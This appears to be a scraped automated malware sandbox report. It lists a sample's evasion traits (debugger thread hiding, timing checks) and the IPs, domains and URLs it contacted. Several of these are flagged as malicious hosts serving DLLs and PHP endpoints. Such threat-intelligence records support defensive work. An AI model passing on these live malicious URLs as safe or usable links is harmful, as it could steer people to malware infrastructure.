RDTSC time measurements 29->121 123 Hides threads from debuggers 29->123 125 Potentially malicious time measurement code found 29->125 77 googlehosted.l.googleusercontent.com 142.250.181.225, 443, 49806 GOOGLEUS United States 31->77 79 152.195.19.97, 443, 52615 EDGECASTUS United States 31->79 85 5 other IPs or domains 31->85 81 s-part-0032.t-0009.t-msedge.net 13.107.246.60, 443, 49766, 49767 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 33->81 83 142.250.64.68, 443, 49787 GOOGLEUS United States 33->83 87 5 other IPs or domains 33->87 file10 signatures11 process12 process13 43 msedge.exe 41->43         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.100
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
152.195.19.97
 unknown United States
15133 EDGECASTUS false
13.107.246.60
 s-part-0032.t-0009.t-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
162.159.61.3
 chrome.cloudflare-dns.com United States
13335 CLOUDFLARENETUS false
142.250.65.238
 unknown United States
15169 GOOGLEUS false
172.64.41.3
 unknown United States
13335 CLOUDFLARENETUS false
185.215.113.19
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
142.250.64.68
 unknown United States
15169 GOOGLEUS false
142.250.181.225
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false

Private

IP
192.168.2.4

Contacted Domains

Name IP Active
chrome.cloudflare-dns.com 162.159.61.3 true
googlehosted.l.googleusercontent.com 142.250.181.225 true
s-part-0032.t-0009.t-msedge.net 13.107.246.60 true
sni1gl.wpc.nucdn.net 152.199.21.175 true
clients2.googleusercontent.com unknown unknown
bzib.nelreports.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.100/0d60be0de163924d/vcruntime140.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.100/ true
  • URL Reputation: malware
 unknown
http://185.215.113.100/0d60be0de163924d/mozglue.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.19/Vi9leo/index.php true
  • 24%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.100/0d60be0de163924d/nss3.dll true
  • URL Reputation: malware
 unknown
https://www.google.com/favicon.ico false
  • Avira URL Cloud: safe
 unknown
https://clients2.googleusercontent.com/crx/blobs/AY4GWKBMNax_FQrZEVzNkO_0mu3UShnzR6AihR_EPjVIUOT_pwZzkWCpOk8YKIu0qnIq_YObWXuPyiJ7NA0nDjMHUEYIIEknsNvJHXuPd0MqxESzoxi9xiMyJKNwZiVV1yEAxlKa5UVe61sINARQ7fO9dE0bkfP_W4GG/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx false
  • Avira URL Cloud: safe
 unknown
http://185.215.113.100/e2b1563c6670f193.php true
  • URL Reputation: malware
 unknown
http://185.215.113.100/0d60be0de163924d/softokn3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.100/0d60be0de163924d/freebl3.dll true
  • URL Reputation: malware
 unknown